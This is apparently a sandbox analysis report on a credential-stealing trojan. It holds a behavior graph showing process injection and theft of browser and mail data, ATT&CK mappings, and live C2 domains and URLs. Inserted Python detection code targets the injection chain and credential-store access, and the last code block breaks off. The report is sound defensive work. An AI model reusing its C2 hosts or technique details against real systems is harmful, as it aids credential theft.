0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: QLLafoDdqv.exe | Binary or memory string: WIN_XPe
Source: QLLafoDdqv.exe | Binary or memory string: WIN_VISTA
Source: QLLafoDdqv.exe | Binary or memory string: WIN_7
Source: QLLafoDdqv.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match; File source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\QLLafoDdqv.exe; Code function: 0_2_00751204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\QLLafoDdqv.exe; Code function: 0_2_00751806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix (numeric prefixes are the report's signature-count badges, reproduced as extracted)

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph (ID 1486705; Sample: QLLafoDdqv.exe; Startdate: 02/08/2024; Architecture: WINDOWS; Score: 100), rendered as text:

Start
  Network: www.joyesi.xyz, www.magmadokum.com, 18 other IPs or domains
  Signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
  www.joyesi.xyz: Performs DNS queries to domains with low reputation
  |
  +-- QLLafoDdqv.exe (started)
        Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
        |
        +-- svchost.exe (started)
              Signatures: Maps a DLL or memory area into another process
              |
              +-- WOaBXdWwIJKzuV.exe (injected)
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    |
                    +-- netbtugc.exe (started)
                          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          |
                          +-- WOaBXdWwIJKzuV.exe (injected)
                          |     Network: www.liangyuen528.com (15.197.172.60, ports 49749, 49750, 49751; TANDEMUS, United States); www.donnavariedades.com (15.197.240.20, ports 49763, 49764, 49765; TANDEMUS, United States); 12 other IPs or domains
                          |     Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                          |
                          +-- firefox.exe (started)
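The chain in the behavior graph above (a Desktop executable spawning svchost.exe, and a SysWOW64 binary, netbtugc.exe, reading the Edge cookie store and the Outlook profile key listed in the signature section) maps directly onto two endpoint detection rules. The Python below is an added example written for this page, not Joe Sandbox code. Its EVENTS records are constructed to mirror that chain: injection is not a process-creation event, so the injected WOaBXdWwIJKzuV.exe intermediary is omitted, and the image paths of svchost.exe and netbtugc.exe are assumptions.

```python
"""Detect the chain from the behavior graph in constructed endpoint telemetry.

Added example for this page, not Joe Sandbox code. EVENTS is constructed: it
reduces the graph to process-creation plus file/registry-access records, omits
the injected intermediary (injection is not a process creation) and assumes the
image paths of svchost.exe and netbtugc.exe.
"""
import ntpath

SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\")
# Targets taken from the report: the Edge cookie store and the Outlook profile key.
CREDENTIAL_MARKERS = ("\\user data\\default\\network\\cookies",
                      "\\user data\\default\\login data",
                      "\\windows messaging subsystem\\profiles\\")

EVENTS = [  # constructed for this example
    {"type": "process", "pid": 50, "ppid": 1, "image": "C:\\Windows\\System32\\services.exe"},
    {"type": "process", "pid": 60, "ppid": 50, "image": "C:\\Windows\\System32\\svchost.exe"},
    {"type": "process", "pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100, "image": "C:\\Users\\user\\Desktop\\QLLafoDdqv.exe"},
    {"type": "process", "pid": 300, "ppid": 200, "image": "C:\\Windows\\SysWOW64\\svchost.exe"},
    {"type": "process", "pid": 400, "ppid": 300, "image": "C:\\Windows\\SysWOW64\\netbtugc.exe"},
    {"type": "file", "pid": 400,
     "path": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies"},
    {"type": "registry", "pid": 400,
     "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"},
    # Benign: the browser itself reading its own cookie store must not alert.
    {"type": "process", "pid": 500, "ppid": 100,
     "image": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"},
    {"type": "file", "pid": 500,
     "path": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies"},
]


def is_system_binary(image):
    return ntpath.dirname(image.lower()) in SYSTEM_DIRS


def is_user_writable(image):
    low = image.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def touches_credential_store(event):
    target = (event.get("path") or event.get("key") or "").lower()
    return any(marker in target for marker in CREDENTIAL_MARKERS)


def ancestry(pid, procs):
    """Image paths from the oldest known ancestor down to pid."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["image"])
        pid = procs[pid]["ppid"]
    return chain[::-1]


def detect(events):
    """Two rules from the graph: svchost.exe whose parent is not services.exe,
    and a System32/SysWOW64 binary reading a browser or mail credential store.
    One alert per (rule, pid); every matching record is kept as evidence."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = {}

    def record(rule, pid, evidence):
        key = (rule, pid)
        if key not in alerts:
            chain = ancestry(pid, procs)
            alerts[key] = {"rule": rule, "pid": pid, "image": procs[pid]["image"],
                           "chain": chain,
                           # A user-writable ancestor (Desktop, AppData, Temp) raises severity.
                           "user_writable_root": any(is_user_writable(i) for i in chain[:-1]),
                           "evidence": []}
        alerts[key]["evidence"].append(evidence)

    for e in events:
        if e["type"] == "process" and ntpath.basename(e["image"]).lower() == "svchost.exe":
            parent = procs.get(e["ppid"])
            parent_name = ntpath.basename(parent["image"]).lower() if parent else ""
            if parent_name != "services.exe":
                record("svchost-unexpected-parent", e["pid"],
                       "parent=" + (parent["image"] if parent else "unknown"))
        elif e["type"] in ("file", "registry") and e["pid"] in procs:
            if is_system_binary(procs[e["pid"]]["image"]) and touches_credential_store(e):
                record("system-binary-credential-access", e["pid"], e.get("path") or e.get("key"))
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["rule"], alert["pid"], " -> ".join(alert["chain"]))
```

The svchost.exe parent check is a coarse heuristic and does not look at command-line arguments; expect to whitelist known exceptions in a real fleet. The credential-store rule fires only for binaries under System32 or SysWOW64, which is exactly the trick this sample uses: a legitimately signed system binary (netbtugc.exe) doing the stealing after being hijacked.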

| Source | Detection | Scanner | Label |
|---|---|---|---|
| QLLafoDdqv.exe | 55% | ReversingLabs | Win32.Trojan.Strab |
| QLLafoDdqv.exe | 40% | Virustotal | |
| QLLafoDdqv.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
| Source | Detection | Scanner |
|---|---|---|
| www.donnavariedades.com | 8% | Virustotal |
| empowermedeco.com | 12% | Virustotal |
| www.liangyuen528.com | 6% | Virustotal |
| natroredirect.natrocdn.com | 0% | Virustotal |
| www.kasegitai.tokyo | 7% | Virustotal |
| www.rssnewscast.com | 6% | Virustotal |
| www.goldenjade-travel.com | 9% | Virustotal |
| www.shenzhoucui.com | 9% | Virustotal |
| www.techchains.info | 11% | Virustotal |
| www.magmadokum.com | 9% | Virustotal |
| www.660danm.top | 11% | Virustotal |
| www.antonio-vivaldi.mobi | 9% | Virustotal |
| www.3xfootball.com | 10% | Virustotal |
| www.empowermedeco.com | 5% | Virustotal |
| elettrosistemista.zip | 11% | Virustotal |
| www.k9vyp11no3.cfd | 9% | Virustotal |
| www.b301.space | 6% | Virustotal |
| www.elettrosistemista.zip | 7% | Virustotal |
| www.joyesi.xyz | 4% | Virustotal |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
| https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
| https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
| https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
| https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
| http://www.empowermedeco.com/fo8o/ | 100% | Avira URL Cloud | malware |
| https://www.reg.com/domain/prolong_period_anonymous?dname=www.b301.space&utm_source=www.b301.space&u | 0% | Avira URL Cloud | safe |
| https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
| http://www.shenzhoucui.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c= | 100% | Avira URL Cloud | malware |
| http://www.goldenjade-travel.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= | 0% | Avira URL Cloud | safe |
| http://yourmine.ru/i/parking/glob_parking.png | 0% | Avira URL Cloud | safe |
| https://duckduckgo.com/ac/?q= | 0% | Virustotal | |
| https://www.value-domain.com/ | 0% | Virustotal | |
| https://www.value-domain.com/ | 0% | Avira URL Cloud | safe |
| https://duckduckgo.com/chrome_newtab | 0% | Virustotal | |
| http://yourmine.ru/i/parking/glob_parking.png | 0% | Virustotal | |
| http://www.donnavariedades.com/fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2 | 0% | Avira URL Cloud | safe |
| https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png | 0% | Avira URL Cloud | safe |
| http://www.liangyuen528.com/fo8o/ | 100% | Avira URL Cloud | malware |
| http://www.magmadokum.com/fo8o/ | 0% | Avira URL Cloud | safe |
| https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | 0% | Avira URL Cloud | safe |
| https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png | 0% | Virustotal | |
| http://www.antonio-vivaldi.mobi/fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp2 | 0% | Avira URL Cloud | safe |
| https://www.google.com | 0% | Avira URL Cloud | safe |
| https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | 0% | Virustotal | |
| http://www.magmadokum.com/fo8o/ | 11% | Virustotal | |
| http://www.rssnewscast.com/fo8o/ | 0% | Avira URL Cloud | safe |
| http://www.empowermedeco.com/fo8o/ | 8% | Virustotal | |
| http://www.liangyuen528.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8= | 100% | Avira URL Cloud | malware |
| http://www.liangyuen528.com/fo8o/ | 6% | Virustotal | |
| http://www.elettrosistemista.zip/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= | 100% | Avira URL Cloud | malware |
| https://www.google.com | 0% | Virustotal | |
| http://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2 | 100% | Avira URL Cloud | malware |
| http://www.kasegitai.tokyo/fo8o/ | 100% | Avira URL Cloud | malware |
| http://www.shenzhoucui.com/fo8o/ | 100% | Avira URL Cloud | malware |
| https://2domains.ru/ | 0% | Avira URL Cloud | safe |
| http://www.rssnewscast.com/fo8o/?blWd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&Ixe=Apq4tPPXNdTp2 | 0% | Avira URL Cloud | safe |
| http://www.joyesi.xyz/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128= | 0% | Avira URL Cloud | safe |
| http://www.goldenjade-travel.com/fo8o/ | 0% | Avira URL Cloud | safe |
| https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand= | 0% | Avira URL Cloud | safe |
| http://www.joyesi.xyz/fo8o/ | 0% | Avira URL Cloud | safe |
| http://www.rssnewscast.com/fo8o/ | 5% | Virustotal | |
| https://2domains.ru | 0% | Avira URL Cloud | safe |
| http://www.antonio-vivaldi.mobi/fo8o/ | 0% | Avira URL Cloud | safe |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
| http://www.elettrosistemista.zip/fo8o/ | 100% | Avira URL Cloud | malware |
| https://www.empowermedeco.com/fo8o/?blWd=mxnR | 100% | Avira URL Cloud | malware |
| http://www.donnavariedades.com/fo8o/ | 0% | Avira URL Cloud | safe |
| http://www.b301.space/ | 0% | Avira URL Cloud | safe |
| https://code.jquery.com/jquery-3.7.1.min.js | 0% | Avira URL Cloud | safe |
| http://www.kasegitai.tokyo/fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2 | 100% | Avira URL Cloud | malware |
| https://www.sedo.com/services/parking.php3 | 0% | Avira URL Cloud | safe |
| https://codepen.io/uzcho_/pens/popular/?grid_type=list | 0% | Avira URL Cloud | safe |
| http://www.b301.space/fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp2 | 0% | Avira URL Cloud | safe |
| https://www.reg.com/domain/service/domain-broker?dname=www.b301.space&utm_source=www.b301.space&utm_ | 0% | Avira URL Cloud | safe |
| http://www.b301.space/fo8o/ | 0% | Avira URL Cloud | safe |
| https://codepen.io/uzcho_/pen/eYdmdXw.css | 0% | Avira URL Cloud | safe |
| https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medi | 0% | Avira URL Cloud | safe |
| https://rakkoma.com/ | 0% | Avira URL Cloud | safe |
| https://www.value-domain.com/modall.php | 0% | Avira URL Cloud | safe |
| http://www.b301.space | 0% | Avira URL Cloud | safe |
| http://www.magmadokum.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= | 0% | Avira URL Cloud | safe |
| http://www.techchains.info/fo8o/ | 100% | Avira URL Cloud | phishing |
| https://reg.ru?target=_blank | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Reputation |
|---|---|---|---|---|
| www.donnavariedades.com | 15.197.240.20 | true | false | unknown |
| empowermedeco.com | 217.196.55.202 | true | false | unknown |
| www.liangyuen528.com | 15.197.172.60 | true | false | unknown |
| natroredirect.natrocdn.com | 85.159.66.93 | true | false | unknown |
| www.kasegitai.tokyo | 52.25.92.0 | true | false | unknown |
| elettrosistemista.zip | 195.110.124.133 | true | false | unknown |
| www.3xfootball.com | 154.215.72.110 | true | false | unknown |
| www.shenzhoucui.com | 72.52.178.23 | true | false | unknown |
| www.antonio-vivaldi.mobi | 46.30.211.38 | true | false | unknown |
| www.goldenjade-travel.com | 116.50.37.244 | true | false | unknown |
| www.rssnewscast.com | 91.195.240.94 | true | false | unknown |
| www.techchains.info | 66.29.149.46 | true | false | unknown |
| www.b301.space | 194.67.71.191 | true | false | unknown |
| www.magmadokum.com | unknown | unknown | true | unknown |
| www.660danm.top | unknown | unknown | true | unknown |
| www.joyesi.xyz | unknown | unknown | true | unknown |
| www.empowermedeco.com | unknown | unknown | true | unknown |
| www.k9vyp11no3.cfd | unknown | unknown | true | unknown |
| www.elettrosistemista.zip | unknown | unknown | true | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.shenzhoucui.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c= | false | Avira URL Cloud: malware | unknown |
| http://www.empowermedeco.com/fo8o/ | false | 8% Virustotal; Avira URL Cloud: malware | unknown |
| http://www.goldenjade-travel.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= | false | Avira URL Cloud: safe | unknown |
| http://www.donnavariedades.com/fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2 | true | Avira URL Cloud: safe | unknown |
| http://www.liangyuen528.com/fo8o/ | false | 6% Virustotal; Avira URL Cloud: malware | unknown |
| http://www.magmadokum.com/fo8o/ | false | 11% Virustotal; Avira URL Cloud: safe | unknown |
| http://www.antonio-vivaldi.mobi/fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp2 | false | Avira URL Cloud: safe | unknown |
| http://www.rssnewscast.com/fo8o/ | false | 5% Virustotal; Avira URL Cloud: safe | unknown |
| http://www.liangyuen528.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8= | false | Avira URL Cloud: malware | unknown |
| http://www.elettrosistemista.zip/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= | false | Avira URL Cloud: malware | unknown |
| http://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2 | false | Avira URL Cloud: malware | unknown |
| http://www.kasegitai.tokyo/fo8o/ | false | Avira URL Cloud: malware | unknown |
| http://www.shenzhoucui.com/fo8o/ | false | Avira URL Cloud: malware | unknown |
| http://www.rssnewscast.com/fo8o/?blWd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&Ixe=Apq4tPPXNdTp2 | false | Avira URL Cloud: safe | unknown |
| http://www.joyesi.xyz/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128= | false | Avira URL Cloud: safe | unknown |
| http://www.goldenjade-travel.com/fo8o/ | false | Avira URL Cloud: safe | unknown |
| http://www.joyesi.xyz/fo8o/ | false | Avira URL Cloud: safe | unknown |
| http://www.antonio-vivaldi.mobi/fo8o/ | false | Avira URL Cloud: safe | unknown |
| http://www.elettrosistemista.zip/fo8o/ | false | Avira URL Cloud: malware | unknown |
| http://www.donnavariedades.com/fo8o/ | true | Avira URL Cloud: safe | unknown |
| http://www.kasegitai.tokyo/fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2 | false | Avira URL Cloud: malware | unknown |
| http://www.b301.space/fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp2 | false | Avira URL Cloud: safe | unknown |
| http://www.b301.space/fo8o/ | false | Avira URL Cloud: safe | unknown |
| http://www.magmadokum.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= | false | Avira URL Cloud: safe | unknown |
| http://www.techchains.info/fo8o/ | false | Avira URL Cloud: phishing | unknown |
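Every C2 URL in the tables above shares one shape: a single short path segment (fo8o) and a query carrying two parameters, a short identifier (Ixe=Apq4tPPXNdTp2) and a base64-looking blob (blWd=...), while the host rotates across the eighteen domains listed. The Python below is an added example for this page, not part of the Joe Sandbox report: it extracts that shape from the report's own URLs and then reuses it against constructed proxy-log lines, so a request to a host the report never listed is still caught. The minimum blob length, the path-token regex and the proxy-log line format are assumptions of this example; the sample URLs are copied from the tables.

```python
"""Turn the FormBook C2 URLs listed in this report into a reusable detection.

Added example for this page, not Joe Sandbox code. SAMPLE_URLS are copied from
the report; BLOB_A is the blWd payload of the www.shenzhoucui.com URL. The
thresholds and the proxy-log format are assumptions of this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

PATH_TOKEN_RE = re.compile(r"^[A-Za-z0-9]{2,8}$")   # one short path segment such as fo8o
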